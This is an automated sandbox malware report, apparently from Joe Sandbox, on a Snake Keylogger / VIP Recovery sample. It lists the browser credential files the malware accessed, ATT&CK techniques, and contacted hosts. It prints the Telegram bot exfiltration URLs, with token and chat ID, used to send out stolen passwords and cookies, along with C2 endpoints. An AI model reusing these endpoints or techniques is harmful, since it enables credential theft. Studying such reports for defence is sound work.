            Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top SitesJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
            Source: Yara matchFile source: 00000005.00000002.2599404721.0000000021DB4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 5752, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: 00000005.00000002.2599404721.0000000021CB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 5752, type: MEMORYSTR
            Source: Yara matchFile source: 00000005.00000002.2599404721.0000000021DE7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
            Windows Management Instrumentation
            1
            DLL Side-Loading
            1
            DLL Side-Loading
            2
            Obfuscated Files or Information
            1
            OS Credential Dumping
            2
            File and Directory Discovery
            Remote Services1
            Archive Collected Data
            1
            Web Service
            Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault Accounts2
            PowerShell
            Boot or Logon Initialization Scripts1
            Access Token Manipulation
            1
            Software Packing
            LSASS Memory14
            System Information Discovery
            Remote Desktop Protocol1
            Data from Local System
            3
            Ingress Tool Transfer
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)311
            Process Injection
            1
            DLL Side-Loading
            Security Account Manager111
            Security Software Discovery
            SMB/Windows Admin Shares1
            Email Collection
            11
            Encrypted Channel
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
            Masquerading
            NTDS1
            Process Discovery
            Distributed Component Object Model1
            Clipboard Data
            1
            Non-Standard Port
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script31
            Virtualization/Sandbox Evasion
            LSA Secrets31
            Virtualization/Sandbox Evasion
            SSHKeylogging4
            Non-Application Layer Protocol
            Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            Access Token Manipulation
            Cached Domain Credentials1
            Application Window Discovery
            VNCGUI Input Capture25
            Application Layer Protocol
            Data Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items311
            Process Injection
            DCSync1
            System Network Configuration Discovery
            Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1588331 Sample: Kb94RzMYNf.exe Startdate: 11/01/2025 Architecture: WINDOWS Score: 100 36 reallyfreegeoip.org 2->36 38 api.telegram.org 2->38 40 6 other IPs or domains 2->40 46 Suricata IDS alerts for network traffic 2->46 48 Found malware configuration 2->48 50 Multi AV Scanner detection for dropped file 2->50 56 7 other signatures 2->56 8 Kb94RzMYNf.exe 27 2->8         started        signatures3 52 Tries to detect the country of the analysis system (by using the IP) 36->52 54 Uses the Telegram API (likely for C&C communication) 38->54 process4 file5 22 C:\Users\user\AppData\Local\...\nsExec.dll, PE32 8->22 dropped 24 C:\Users\user\AppData\...\Sunsetting.Spe, Unicode 8->24 dropped 58 Suspicious powershell command line found 8->58 12 powershell.exe 30 8->12         started        signatures6 process7 file8 26 C:\Users\user\AppData\...\Kb94RzMYNf.exe, PE32 12->26 dropped 28 C:\Users\...\Kb94RzMYNf.exe:Zone.Identifier, ASCII 12->28 dropped 60 Early bird code injection technique detected 12->60 62 Writes to foreign memory regions 12->62 64 Found suspicious powershell code related to unpacking or dynamic code loading 12->64 66 3 other signatures 12->66 16 msiexec.exe 15 8 12->16         started        20 conhost.exe 12->20         started        signatures9 process10 dnsIp11 30 abraher.com 82.194.91.193, 49998, 50000, 587 ACENS_ASSpainHostinghousingandVPNservicesES Spain 16->30 32 checkip.dyndns.com 132.226.247.73, 49980, 49983, 49985 UTMEMUS United States 16->32 34 4 other IPs or domains 16->34 42 Tries to steal Mail credentials (via file / registry access) 16->42 44 Tries to harvest and steal browser information (history, passwords, etc) 16->44 signatures12

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            Kb94RzMYNf.exe72%VirustotalBrowse
            Kb94RzMYNf.exe53%ReversingLabsWin32.Spyware.Snakekeylogger
            Kb94RzMYNf.exe100%Joe Sandbox ML
            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\neoimpressionism\Kb94RzMYNf.exe100%Joe Sandbox ML
            C:\Users\user\AppData\Local\Temp\nsj9A32.tmp\nsExec.dll0%ReversingLabs
            C:\Users\user\AppData\Local\neoimpressionism\Kb94RzMYNf.exe53%ReversingLabsWin32.Spyware.Snakekeylogger
            No Antivirus matches
            No Antivirus matches
            SourceDetectionScannerLabelLink
            http://abraher.com0%Avira URL Cloudsafe
            http://mail.abraher.com0%Avira URL Cloudsafe
            http://www.skinstudio.netG0%Avira URL Cloudsafe
            NameIPActiveMaliciousAntivirus DetectionReputation
            abraher.com
            82.194.91.193
            truetrue
              unknown
              s-part-0017.t-0009.t-msedge.net
              13.107.246.45
              truefalse
                high
                drive.google.com
                142.250.184.238
                truefalse
                  high
                  drive.usercontent.google.com
                  142.250.181.225
                  truefalse
                    high
                    reallyfreegeoip.org
                    104.21.16.1
                    truefalse
                      high
                      api.telegram.org
                      149.154.167.220
                      truefalse
                        high
                        checkip.dyndns.com
                        132.226.247.73
                        truefalse
                          high
                          mail.abraher.com
                          unknown
                          unknowntrue
                            unknown
                            checkip.dyndns.org
                            unknown
                            unknownfalse
                              high
                              NameMaliciousAntivirus DetectionReputation
                              https://reallyfreegeoip.org/xml/8.46.123.189false
                                high
                                https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:048707%0D%0ADate%20and%20Time:%2011/01/2025%20/%2006:42:07%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20048707%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5Dfalse
                                  high
                                  https://api.telegram.org/bot8101497037:AAEvNeES2X17rekW3womq6JjOwgZLJMqX1Y/sendDocument?chat_id=7171338311&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recoveryfalse
                                    high
                                    http://checkip.dyndns.org/false
                                      high
                                      https://api.telegram.org/bot8101497037:AAEvNeES2X17rekW3womq6JjOwgZLJMqX1Y/sendDocument?chat_id=7171338311&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recoveryfalse
                                        high
                                        NameSourceMaliciousAntivirus DetectionReputation
                                        https://www.office.com/msiexec.exe, 00000005.00000002.2599404721.0000000021E9D000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://duckduckgo.com/chrome_newtabmsiexec.exe, 00000005.00000002.2601116550.0000000022CD1000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://duckduckgo.com/ac/?q=msiexec.exe, 00000005.00000002.2601116550.0000000022CD1000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://api.telegram.orgmsiexec.exe, 00000005.00000002.2599404721.0000000021D91000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2599404721.0000000021DF7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://www.google.com/images/branding/product/ico/googleg_lodp.icomsiexec.exe, 00000005.00000002.2601116550.0000000022CD1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://api.telegram.org/botmsiexec.exe, 00000005.00000002.2599404721.0000000021DF7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://translate.google.com/translate_a/element.jsmsiexec.exe, 00000005.00000003.1918747980.0000000000577000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.1918595258.000000000053C000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.1956562799.0000000000537000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.1954214268.0000000000539000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      high
                                                      https://www.office.com/Pmsiexec.exe, 00000005.00000002.2599404721.0000000021E8E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        http://abraher.commsiexec.exe, 00000005.00000002.2599404721.0000000021DE7000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2599404721.0000000021DF7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        unknown
                                                        https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:048707%0D%0ADate%20amsiexec.exe, 00000005.00000002.2599404721.0000000021D91000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          https://www.office.com/lBmsiexec.exe, 00000005.00000002.2599404721.0000000021E98000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            https://drive.google.com/Nmsiexec.exe, 00000005.00000002.2582024062.00000000004FF000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2564398022.00000000004FF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              high
                                                              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=msiexec.exe, 00000005.00000002.2601116550.0000000022CD1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                https://drive.usercontent.google.com/msiexec.exe, 00000005.00000003.2564398022.000000000051F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2582024062.000000000051F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.1956562799.0000000000537000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.1954214268.0000000000539000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  high
                                                                  http://checkip.dyndns.orgmsiexec.exe, 00000005.00000002.2599404721.0000000021CB1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=msiexec.exe, 00000005.00000002.2601116550.0000000022CD1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://mail.abraher.commsiexec.exe, 00000005.00000002.2599404721.0000000021DE7000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2599404721.0000000021DF7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      http://nsis.sf.net/NSIS_ErrorErrorKb94RzMYNf.exe, Kb94RzMYNf.exe.2.drfalse
                                                                        high
                                                                        https://api.telegram.org/bot/sendMessage?chat_id=&text=msiexec.exe, 00000005.00000002.2599404721.0000000021D91000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://chrome.google.com/webstore?hl=enmsiexec.exe, 00000005.00000002.2599404721.0000000021E6C000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2599404721.0000000021DB4000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2599404721.0000000021E5D000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2599404721.0000000021E9D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://www.ecosia.org/newtab/msiexec.exe, 00000005.00000002.2601116550.0000000022CD1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              http://www.skinstudio.netGKb94RzMYNf.exe, Kb94RzMYNf.exe.2.drfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              http://varders.kozow.com:8081msiexec.exe, 00000005.00000002.2599404721.0000000021CB1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                http://aborters.duckdns.org:8081msiexec.exe, 00000005.00000002.2599404721.0000000021CB1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://ac.ecosia.org/autocomplete?q=msiexec.exe, 00000005.00000002.2601116550.0000000022CD1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://www.google.commsiexec.exe, 00000005.00000003.1918747980.0000000000577000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.1918595258.000000000053C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://api.telegram.org/bot8101497037:AAEvNeES2X17rekW3womq6JjOwgZLJMqX1Y/sendDocument?chat_id=7171msiexec.exe, 00000005.00000002.2599404721.0000000021DF7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        http://51.38.247.67:8081/_send_.php?Lmsiexec.exe, 00000005.00000002.2599404721.0000000021DE7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://drive.google.com/msiexec.exe, 00000005.00000002.2582024062.00000000004FF000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2564398022.00000000004FF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://drive.usercontent.google.com/Amsiexec.exe, 00000005.00000003.2564398022.000000000051F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2582024062.000000000051F000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.1956562799.0000000000537000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.1954214268.0000000000539000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              http://anotherarmy.dns.army:8081msiexec.exe, 00000005.00000002.2599404721.0000000021CB1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchmsiexec.exe, 00000005.00000002.2601116550.0000000022CD1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://chrome.google.com/webstore?hl=enlBmsiexec.exe, 00000005.00000002.2599404721.0000000021E67000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    https://reallyfreegeoip.org/xml/8.46.123.189$msiexec.exe, 00000005.00000002.2599404721.0000000021D6B000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2599404721.0000000021D26000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2599404721.0000000021D91000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      https://reallyfreegeoip.orgmsiexec.exe, 00000005.00000002.2599404721.0000000021D6B000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2599404721.0000000021CFC000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.2599404721.0000000021D91000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://chrome.google.com/webstore?hl=enPmsiexec.exe, 00000005.00000002.2599404721.0000000021E5D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          https://apis.google.commsiexec.exe, 00000005.00000003.1918747980.0000000000577000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.1918595258.000000000053C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            http://api.telegram.orgmsiexec.exe, 00000005.00000002.2599404721.0000000021DF7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namemsiexec.exe, 00000005.00000002.2599404721.0000000021CB1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=msiexec.exe, 00000005.00000002.2601116550.0000000022CD1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  https://reallyfreegeoip.org/xml/msiexec.exe, 00000005.00000002.2599404721.0000000021CFC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    • No. of IPs < 25%
                                                                                                                    • 25% < No. of IPs < 50%
                                                                                                                    • 50% < No. of IPs < 75%
                                                                                                                    • 75% < No. of IPs
                                                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                                                    149.154.167.220
                                                                                                                    api.telegram.orgUnited Kingdom
                                                                                                                    62041TELEGRAMRUfalse
                                                                                                                    104.21.16.1
                                                                                                                    reallyfreegeoip.orgUnited States
                                                                                                                    13335CLOUDFLARENETUSfalse
                                                                                                                    142.250.181.225
                                                                                                                    drive.usercontent.google.comUnited States
                                                                                                                    15169GOOGLEUSfalse
                                                                                                                    142.250.184.238
                                                                                                                    drive.google.comUnited States
                                                                                                                    15169GOOGLEUSfalse
                                                                                                                    82.194.91.193
                                                                                                                    abraher.comSpain
                                                                                                                    16371ACENS_ASSpainHostinghousingandVPNservicesEStrue
                                                                                                                    132.226.247.73
                                                                                                                    checkip.dyndns.comUnited States
                                                                                                                    16989UTMEMUSfalse
                                                                                                                    Joe Sandbox version:42.0.0 Malachite
                                                                                                                    Analysis ID:1588331
                                                                                                                    Start date and time:2025-01-11 00:05:30 +01:00
                                                                                                                    Joe Sandbox product:CloudBasic
                                                                                                                    Overall analysis duration:0h 6m 48s
                                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                                    Report type:full
                                                                                                                    Cookbook file name:default.jbs
                                                                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                    Number of analysed new started processes analysed:10
                                                                                                                    Number of new started drivers analysed:0
                                                                                                                    Number of existing processes analysed:0
                                                                                                                    Number of existing drivers analysed:0
                                                                                                                    Number of injected processes analysed:0
                                                                                                                    Technologies:
                                                                                                                    • HCA enabled
                                                                                                                    • EGA enabled
                                                                                                                    • AMSI enabled
                                                                                                                    Analysis Mode:default
                                                                                                                    Analysis stop reason:Timeout
                                                                                                                    Sample name:Kb94RzMYNf.exe
                                                                                                                    renamed because original name is a hash value
                                                                                                                    Original Sample Name:f19b72b88ddbf56b257e6eef19c74e304beaf8f95d352741e400993472e721c9.exe
                                                                                                                    Detection:MAL
                                                                                                                    Classification:mal100.troj.spyw.evad.winEXE@6/13@6/6
                                                                                                                    EGA Information:
                                                                                                                    • Successful, ratio: 100%
                                                                                                                    HCA Information:
                                                                                                                    • Successful, ratio: 89%
                                                                                                                    • Number of executed functions: 71
                                                                                                                    • Number of non-executed functions: 45
                                                                                                                    Cookbook Comments:
                                                                                                                    • Found application associated with file extension: .exe
                                                                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                                                    • Excluded IPs from analysis (whitelisted): 13.107.246.45, 4.245.163.56
                                                                                                                    • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, ctldl.windowsupdate.com, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                                                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                    • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                    • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                    TimeTypeDescription
                                                                                                                    18:06:28API Interceptor39x Sleep call for process: powershell.exe modified
                                                                                                                    18:07:33API Interceptor2658x Sleep call for process: msiexec.exe modified
                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                    149.154.167.220WGi85dsMNp.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                      cOH7jKmo25.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                                                                                        3i1gMM8K4z.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                          2NJzy3tiny.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                            z87sammylastborn.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                              vnV17JImCH.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                czHx16QwGQ.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                  6cicUo3f8g.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                    C5JLkBS1CX.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                      rXKfKM0T49.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                        104.21.16.1NFhRxwbegd.exeGet hashmaliciousFormBookBrowse
                                                                                                                                        • www.kkpmoneysocial.top/86am/
                                                                                                                                        JNKHlxGvw4.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                                        • 188387cm.n9shteam.in/videolinePipeHttplowProcessorgamelocalTemp.php
                                                                                                                                        132.226.247.73z87sammylastborn.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                        • checkip.dyndns.org/
                                                                                                                                        Ddj3E3qerh.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                        • checkip.dyndns.org/
                                                                                                                                        6cicUo3f8g.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                        • checkip.dyndns.org/
                                                                                                                                        rXKfKM0T49.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                        • checkip.dyndns.org/
                                                                                                                                        4Vx2rUlb0f.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                        • checkip.dyndns.org/
                                                                                                                                        9Yn5tjyOgT.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                        • checkip.dyndns.org/
                                                                                                                                        6ZoBPR3isG.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                        • checkip.dyndns.org/
                                                                                                                                        JgE2YgxSzB.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                        • checkip.dyndns.org/
                                                                                                                                        upXUt2jZ0S.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                        • checkip.dyndns.org/
                                                                                                                                        2CQ2zMn0hb.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                        • checkip.dyndns.org/
                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                        s-part-0017.t-0009.t-msedge.net240815025266174071.jsGet hashmaliciousStrela DownloaderBrowse
                                                                                                                                        • 13.107.246.45
                                                                                                                                        hgq5nzWJll.exeGet hashmaliciousFormBookBrowse
                                                                                                                                        • 13.107.246.45
                                                                                                                                        Ddj3E3qerh.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                        • 13.107.246.45
                                                                                                                                        WN9uCxgU1T.exeGet hashmaliciousUnknownBrowse
                                                                                                                                        • 13.107.246.45
                                                                                                                                        Full-Ver_Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                        • 13.107.246.45
                                                                                                                                        Yef4EqsQha.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                        • 13.107.246.45
                                                                                                                                        Qz8OEUxYuH.exeGet hashmaliciousFormBookBrowse
                                                                                                                                        • 13.107.246.45
                                                                                                                                        ztcrKv3zFz.exeGet hashmaliciousFormBookBrowse
                                                                                                                                        • 13.107.246.45
                                                                                                                                        gH3LlhcRzg.exeGet hashmaliciousFormBookBrowse
                                                                                                                                        • 13.107.246.45
                                                                                                                                        3j7f6Bv4FT.exeGet hashmaliciousUnknownBrowse
                                                                                                                                        • 13.107.246.45
                                                                                                                                        reallyfreegeoip.orgWGi85dsMNp.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                        • 104.21.16.1
                                                                                                                                        wymvwQ4mC4.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                        • 104.21.96.1
                                                                                                                                        H75MnQEha8.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                        • 104.21.112.1
                                                                                                                                        3i1gMM8K4z.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                        • 104.21.16.1
                                                                                                                                        2NJzy3tiny.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                        • 104.21.32.1
                                                                                                                                        z87sammylastborn.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                        • 104.21.48.1
                                                                                                                                        vnV17JImCH.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                        • 104.21.80.1
                                                                                                                                        czHx16QwGQ.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                        • 104.21.112.1
                                                                                                                                        Ddj3E3qerh.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                        • 104.21.96.1
                                                                                                                                        6cicUo3f8g.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                        • 104.21.32.1
                                                                                                                                        api.telegram.orgWGi85dsMNp.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                        • 149.154.167.220
                                                                                                                                        cOH7jKmo25.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                                                                                                        • 149.154.167.220
                                                                                                                                        3i1gMM8K4z.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                        • 149.154.167.220
                                                                                                                                        2NJzy3tiny.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                        • 149.154.167.220
                                                                                                                                        z87sammylastborn.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                        • 149.154.167.220
                                                                                                                                        vnV17JImCH.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                        • 149.154.167.220
                                                                                                                                        czHx16QwGQ.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                        • 149.154.167.220
                                                                                                                                        6cicUo3f8g.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                        • 149.154.167.220
                                                                                                                                        C5JLkBS1CX.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                        • 149.154.167.220
                                                                                                                                        rXKfKM0T49.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                        • 149.154.167.220
                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                        TELEGRAMRUWGi85dsMNp.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                        • 149.154.167.220
                                                                                                                                        cOH7jKmo25.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                                                                                                        • 149.154.167.220
                                                                                                                                        3i1gMM8K4z.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                        • 149.154.167.220
                                                                                                                                        2NJzy3tiny.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                        • 149.154.167.220
                                                                                                                                        z87sammylastborn.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                        • 149.154.167.220
                                                                                                                                        vnV17JImCH.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                        • 149.154.167.220
                                                                                                                                        czHx16QwGQ.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                        • 149.154.167.220
                                                                                                                                        6cicUo3f8g.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                        • 149.154.167.220
                                                                                                                                        C5JLkBS1CX.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                        • 149.154.167.220
                                                                                                                                        rXKfKM0T49.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
